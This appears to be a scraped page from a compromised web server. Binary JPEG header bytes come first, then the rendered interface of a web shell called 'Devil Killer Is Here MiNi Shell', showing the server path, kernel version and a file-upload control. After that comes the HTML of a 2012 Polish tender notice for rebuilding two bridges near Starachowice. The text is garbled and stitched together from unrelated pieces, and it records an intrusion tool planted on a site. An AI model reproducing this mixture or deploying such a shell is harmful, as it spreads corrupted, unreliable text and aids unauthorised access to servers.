JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120403/103176-N-2012.html

<p class="kh_header"><b>Starachowice: Przebudowa mostów : na rzece Psarka w m. Tarczek i na rzece Czarna Woda  w m. Łomno położonych w ciągu dróg powiatowych łączących drogi wojewódzkie  nr 751 i 752.</b><br>
<b>Numer ogłoszenia: 103176 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Starachowicach , ul. Ostrowiecka 15, 27-200 Starachowice, woj. świętokrzyskie, tel. (041) 273 19 72-73, faks (041) 273 19 74.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa mostów : na rzece Psarka w m. Tarczek i na rzece Czarna Woda  w m. Łomno położonych w ciągu dróg powiatowych łączących drogi wojewódzkie  nr 751 i 752..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na  dwa  zadania częściowe: 

Zadanie 1 -   Przebudowa mostu  na  rzece Czarna Woda  w ciągu drogi powiatowej   
                     nr 0601 T Łomno -  Zarzecze w miejscowości Łomno

Zadanie 2 - Przebudowa mostu na rzece Psarka w ciągu drogi powiatowej nr 0602 T 
                     Tarczek - Grabków  w miejscowości Tarczek.


Opis przedmiotu zamówienia na zadanie 1.

Zadanie obejmuje:
-  przebudowę mostu na  rzece Czarna Woda  w ciągu drogi powiatowej   
       nr 0601 T Łomno -  Zarzecze w miejscowości Łomno 
-   wzmocnienie nawierzchni  na drodze dojazdowej do mostu  - droga powiatowa  
      nr    0601 T Łomno - Zarzecze w m. Łomno.   

 Opis przedmiotu zamówienia na zadanie 2.

  Zadanie obejmuje:
             - Przebudowę mostu na rzece Psarka w ciągu drogi powiatowej nr 0602 T 
               Tarczek - Grabków  w miejscowości Tarczek
             - wzmocnienie nawierzchni na drodze dojazdowej do mostu  - droga powiatowa  
               nr 0602 T Tarczek - Grabków  (od drogi wojewódzkiej nr 752 do mostu).
             - wzmocnienie nawierzchni na drodze dojazdowej do mostu -droga powiatowa 
                nr 0602 T Tarczek - Grabków (od m. Tarczek Górny do mostu)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3, 45.23.32.20-7, 45.23.24.52-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przetargu wymagane jest wniesienie wadium w wysokości:
Zadanie 1 - 10 000,00 zł  słownie złotych: dziesięć tysięcy 00/100.
Zadanie 2 - 14 000,00 zł słownie złotych: czternaście tysięcy 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia  nie 
                        wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1 

                a. Wykonawca  posiada  wiedzę i doświadczenie polegające na wykonaniu 
                      w okresie ostatnich pięciu lat  przed upływem   terminu  składania ofert  , 
                      a jeśli okres działalności jest krótszy  - w tym   okresie , minimum 
                     jednej roboty budowlanej odpowiadającej  swoim rodzajem  robotom budowlanym
                      stanowiącym  przedmiot zamówienia  , tj: roboty  budowlane polegające na
                    przebudowie , rozbudowie,  budowie , odbudowie itp. mostu  o wartości 
                      minimum 800 000,00 zł   potwierdzone dokumentami  , że zostało wykonane 
                      zgodnie z zasadami sztuki   budowlanej  i prawidłowo ukończone.

 
                b. Wykonawca posiada wiedzę i doświadczenie polegające na 
                     wykonaniu w okresie ostatnich pięciu lat przed upływem
                     terminu składania ofert , a jeśli okres prowadzenie  działalności jest 
                     krótszy -  w tym okresie , minimum jednej roboty budowlanej 
                     odpowiadającej swoim  rodzajem robotom budowlanym  stanowiącym
                     przedmiot  zamówienia , tj:  roboty  budowlane polegające na budowie,
                    przebudowie ,  rozbudowie, odbudowie, remoncie  drogi  o wartości nie 
                    mniejszej niż 140 000,00 zł  potwierdzone dokumentami , że zostały
                     wykonane zgodnie  z  zasadami  sztuki   budowlanej i prawidłowo 
                     ukończone.

     Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykażą, że   łącznie    
      spełniają w/w warunek.

       Warunek zostanie spełniony, jeżeli Wykonawca  wykaże, że zrealizował minimum jedno
        zamówienie zgodne z opisem w pkt. a i minimum jedno zamówienie zgodne z opisem 
        w pkt. b oraz  załączy dokumenty  potwierdzające że zamówienie zostały  wykonane 
        zgodnie  z zasadami sztuki   budowlanej  i prawidłowo ukończone.
 
Zamawiający dokona oceny spełnienia niniejszego warunku na postawie informacji zawartych w złożonych dokumentach- spełnia /nie spełnia.


              Zadanie 2 

               a. Wykonawca  posiada  wiedzę i doświadczenie polegające na wykonaniu 
                      w okresie ostatnich pięciu lat  przed upływem   terminu  składania ofert  , 
                      a jeśli okres działalności jest krótszy  - w tym   okresie , minimum 
                     jednej roboty budowlanej odpowiadającej  swoim rodzajem  robotom budowlanym
                      stanowiącym  przedmiot zamówienia  , tj: roboty  budowlane polegające na
                    przebudowie , rozbudowie,  budowie , odbudowie itp. mostu  o wartości 
                      minimum 600 000,00 zł   potwierdzone dokumentami  , że zostało wykonane 
                      zgodnie z zasadami sztuki   budowlanej  i prawidłowo ukończone.

 
                b. Wykonawca posiada wiedzę i doświadczenie polegające na 
                     wykonaniu w okresie ostatnich pięciu lat przed upływem
                     terminu składania ofert , a jeśli okres prowadzenie  działalności jest 
                     krótszy -  w tym okresie , minimum jednej roboty budowlanej 
                     odpowiadającej swoim  rodzajem robotom budowlanym  stanowiącym
                     przedmiot  zamówienia , tj:  roboty  budowlane polegające na budowie,
                    przebudowie ,  rozbudowie, odbudowie, remoncie  drogi  o wartości nie 
                    mniejszej niż 700 000,00 zł  potwierdzone dokumentami , że zostały
                     wykonane zgodnie  z  zasadami  sztuki   budowlanej i prawidłowo 
                     ukończone.

     Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykażą, że   łącznie    
      spełniają w/w warunek.

       Warunek zostanie spełniony, jeżeli Wykonawca  wykaże, że zrealizował minimum jedno
        zamówienie zgodne z opisem w pkt. a i minimum jedno zamówienie zgodne z opisem 
        w pkt. b oraz  załączy dokumenty  potwierdzające że zamówienie zostały  wykonane 
        zgodnie  z zasadami sztuki   budowlanej  i prawidłowo ukończone.
 
Zamawiający dokona oceny spełnienia niniejszego warunku na postawie informacji zawartych w złożonych dokumentach- spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od szczegółowego opisu warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1          Kierownik budowy musi posiadać uprawnienia budowlane w zakresie
                                                    kierowania robotami budowlanymi , specjalność  
                                                    mostowa lub odpowiadające im ważne uprawnienia 
                                                    budowlane wydane na podstawie wcześniej obowiązujących
                                                    przepisów  oraz przynależeć do Polskiej   Izby    Budownictwa. 
                                                (podstawa - ustawa  z dnia 07 lipca 1994r. -Prawo
                                                   budowlane Dz.  U. 243  poz. 1623  z 2010r -  tekst   jednolity).

Warunek zostanie spełniony, jeżeli wykonawca w wykazie  osób   wykaże na czas realizacji zamówienia  na stanowisko kierownika budowy osobę posiadającą  ww. uprawnienia  oraz załączy  oświadczenie  o posiadaniu przez tę osobę  wymaganych uprawnień. 

 Wykonawca może wykazać na stanowisko kierownika budowy  osobę będącą obywatelem państwa członkowskiego, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach ustawy z dnia  18.03.2008r - zasady uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. 

  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykażą, że   łącznie   spełniają 
   w/w warunek.
   
      Zadanie 2
          Kierownik budowy musi posiadać uprawnienia budowlane w zakresie
                                                    kierowania robotami budowlanymi , specjalność  
                                                    mostowa lub odpowiadające im ważne uprawnienia 
                                                    budowlane wydane na podstawie wcześniej obowiązujących
                                                    przepisów  oraz przynależeć do Polskiej   Izby    Budownictwa. 
                                                (podstawa - ustawa  z dnia 07 lipca 1994r. -Prawo
                                                   budowlane Dz.  U. 243  poz. 1623  z 2010r -  tekst   jednolity).

Warunek zostanie spełniony, jeżeli wykonawca w wykazie  osób   wykaże na czas realizacji zamówienia  na stanowisko kierownika budowy osobę posiadającą  ww. uprawnienia  oraz załączy  oświadczenie  o posiadaniu przez tę osobę  wymaganych uprawnień. 

Wykonawca może wykazać na stanowisko kierownika budowy  osobę będącą obywatelem państwa członkowskiego, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach ustawy z dnia  18.03.2008r - zasady uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. 

  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykażą, że   łącznie   spełniają 
   w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od szczegółowego opisu warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowę można zmienić, jeżeli wystąpią istotne okoliczności, których nie można 
                   było przewidzieć w chwili zawarcia umowy:
                    a. w przypadku wystąpienia nieprzewidzianych robót, mających wpływ na 
                          prawidłowe wykonanie przedmiotu umowy, których realizacja powoduje
                          konieczność  przedłużenia terminu umowy podstawowej, Zamawiający 
                          dopuszcza możliwość  przedłużenia tego terminu, o okres niezbędny do
                          realizacji w/w robót,
                    b. przedłużenie terminu realizacji zamówienia w przypadku wystąpienia
                          niekorzystnych warunków atmosferycznych powodujących konieczność
                          przerwania robót,  potwierdzoną przez osobę nadzorującą  wpisem do
                         dziennika budowy,
                   c.  zmiana osoby na  stanowisku kierownika   budowy  pod warunkiem, że 
                          wskazana osoba spełniać    będzie wymagania  określone w specyfikacji 
                          istotnych warunków zamówienia,  
                   d.    zmian teleadresowych Stron umowy określonych w umowie;
                   e.   oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdp-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych
27-200 Starachowice
ul. Ostrowiecka 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2012 godzina 10:00, miejsce: Zarząd Dróg Powiatowych
27-200 Starachowice
ul. Ostrowiecka 15 , sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa mostu  na  rzece Czarna Woda  w ciągu drogi powiatowej   
                     nr 0601 T Łomno -  Zarzecze w miejscowości Łomno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
-  przebudowę mostu na  rzece Czarna Woda  w ciągu drogi powiatowej   
       nr 0601 T Łomno -  Zarzecze w miejscowości Łomno 
-   wzmocnienie nawierzchni  na drodze dojazdowej do mostu  - droga powiatowa  
      nr    0601 T Łomno - Zarzecze w m. Łomno.   

       
1.	 Opis dotyczący  przebudowy mostu.
 
a.	Stan istniejący
            Most jako tymczasowy wybudowany został w 1985 roku a w roku 2002 przebudowane zostały jego podpory na stałe, natomiast ustrój nośny umożliwiający przejazd pojazdów 15 tonowych został ponownie wykorzystany. Obiekt usytuowany jest na prostym odcinku drogi powiatowej nr 0601 T  poza terenem zabudowanym. Przeszkodą jest rzeka Czarna Woda, która płynie pod kątem 90° w stosunku do drogi powiatowej. Niweletę na obiekcie stanowi linia prosta o spadku podłużnym wynoszącym 0,4% w kierunku miejscowości Łomno.
Most jednoprzęsłowy o schemacie statycznym belki swobodnie podpartej. Przekrój poprzeczny ustroju nośnego stanowi cztery stalowe dźwigary INP o wysokości 550 mm (wzmocnione w środku rozpiętości przyspawanymi do dolnej półki ceownikami C300) rozstawione co 1,50 m i długości teoretycznej. Lt= 15,70 m. Ustrój nośny oparty jest na żelbetowych przyczółkach o grubości korpusu 70 cm za pośrednictwem stalowych łożysk stycznych. Przyczółki posadowione są na dwóch rzędach pali żelbetowych formowanych 
w stalowych rurach o średnicy zewnętrznejfi406 mm. Długość pali H=500 cm. Ilość pali dla jednego przyczółka n=10szt. 
Przekrój poprzeczny pomostu jest krawężnikowy. W pomoście można wyróżnić jezdnię o szerokości 560 cm, którą stanowi pokład drewniany dwuwarstwowy, dolny z bali  100 mm, górny z tarcicy 50 mm zaimpregnowanej. Krawężniki na moście drewniane z bali 20x10 cm. Poręcze stalowe wykonane z C80 mm i wysokości 110 cm z przeciągami L50x50x5 mm mocowane do poprzecznic drewnianych oraz krawężnika. Szerokość całkowita obiektu wynosi 706 cm.
Stożki nasypu są umocnione prefabrykowanymi dyblami o gr. 15 cm opartymi na betonowym fundamencie 30x50 cm. Na końcach stożków zlokalizowane są trapezowe ścieki skarpowe.

 Dane ogólne:
Długość całkowita (ze skrzydełkami)	Lc = 22,20 m
Długość ustroju nośnego			Lk = 16,90 m
Szerokość całkowita			Bc = 7,06 m
Szerokość jezdni			Bj = 5,60 m
Układ statyczny			belka swobodnie podparta
Przeszkoda			rzeka Czarna Woda
Kąt skrzyżowania osi podłużnej
drogi z osią przeszkody			90°
Konstrukcja przęsła	dźwigary INP 550 wzmacniane w środku rozpiętości dospawanymi ceownikami C300
Nawierzchnia jezdni	pokład dwuwarstwowy, dolny z bali gr. 10 cm, górny gr. 5 cm
Krawężniki				bale drewniane 20x10 cm
Urządzenia bezpieczeństwa 		balustrada z ceownika C80 z przeciągami L 50x50x5 mm
Przyczółki	żelbetowe pełnościenne o gr. korpusu 70 cm ze skrzydełkami podwieszonymi o gr. 30 cm
Płyty przejściowe 			nie ma
Posadowienie		pale żelbetowe formowane w stalowych rurach o średnicy zewnętrznej fi406 mm. Długość pali H=500 cm. Ilość pali dla jednego przyczółka n=10szt. 
Łożyska			stalowe styczne, kotwione
Urządzenia dylatacyjne			nie ma
Urządzenia obce	nie stwierdzono podczas przeglądu.

b.  Stan projektowany

Przebudowę istniejącego ustroju nośnego projektuje się ze  względu na konieczność wymiany uszkodzonego pomostu drewnianego, postępującą korozję dźwigarów głównych oraz konieczność dostosowania mostu do przenoszenia obciążeń klasy C zgodnie
 z PN-85/S-10030. Dzięki przebudowie spełnione zostaną wymagania dotyczące bezpieczeństwa ruchu. Przebudowa obiektu ma również służyć zwiększeniu jego trwałości i estetyki.
Przebudowa mostu będzie polegała na rozbiórce istniejących elementów wyposażenia tj. balustrad stalowych, drewnianego pokładu górnego, pokładu dolnego, drewnianych poprzecznic oraz demontażu stalowej konstrukcji nośnej z kształtowników walcowanych INP 550 w rozstawie co 1,50m. W miejscu zdemontowanego ustroju nośnego wykonana zostanie nowa konstrukcja stalowo-żelbetowa (zespolona), którą stanowić będą cztery dźwigary blachownicowe w rozstawie 1,75 m + 2,0 m + 1,75 m o zmiennej wysokości H=652-700 mm, zespolone za pomocą sworzni z żelbetową płytą pomostu o grubości 18 cm. Na dojazdach do mostu wykonane zostaną płyty przejściowe o gr 25. cm i długości 400 cm.
Na nowej płycie pomostu po ułożeniu izolacji termozgrzewalnej po obu stronach obiektu wykonane zostaną belki podporęczowe dostosowane do zamontowania barieroporęczy sztywnych przekładkowych o wysokości H=110cm. Belki podporęczowe zostaną oddzielone od jezdni kotwionym krawężnikiem kamiennym 20x20cm, wyniesionym 14 cm powyżej poziomu jezdni i ułożonym na zaprawie niskoskurczowej. Odwodnienie na obiekcie odbywać się będzie za pomocą spadków poprzecznych i podłużnego prowadzących wodę do wpustów krawężnikowych. Z poziomu izolacji woda odprowadzona zostanie za pomocą saczków o średnicy fi50mm.
Barieroporęcze na moście przedłużone zostaną na dojazdach barierami ochronnymi typu SP-06 z rozstawem słupków co 2,0 m (odcinki przejściowe o długości 12m, odcinki początkowe i końcowe schodzące do terenu o długości 8m).
W czasie przebudowy most będzie całkowicie wyłączony z ruchu pojazdów zgodnie z opracowanym przez Wykonawcę Projektem Czasowej Organizacji Ruchu. Na czas robót zapewnione będzie przez Wykonawcę robót bezpieczne przejście dla pieszych.
Zakres przebudowy mostu będzie obejmował też odcinki drogi przyległe do mostu. Dojazdy o długości 26,0 m + 15,2 m = 41,2 m zostaną poszerzone do szerokości jezdni na moście wynoszącej 6,0 m.  

Przebudowa mostu w miejscowości Łomno polegała będzie na:

-    demontażu balustrad, krawężników,  nawierzchni jezdni oraz poprzecznic,
-    demontażu stalowego ustroju nośnego,
-    rozebraniu warstw nawierzchniowych za przyczółkami,
-    rozebraniu umocnienia stożków skarpowych,
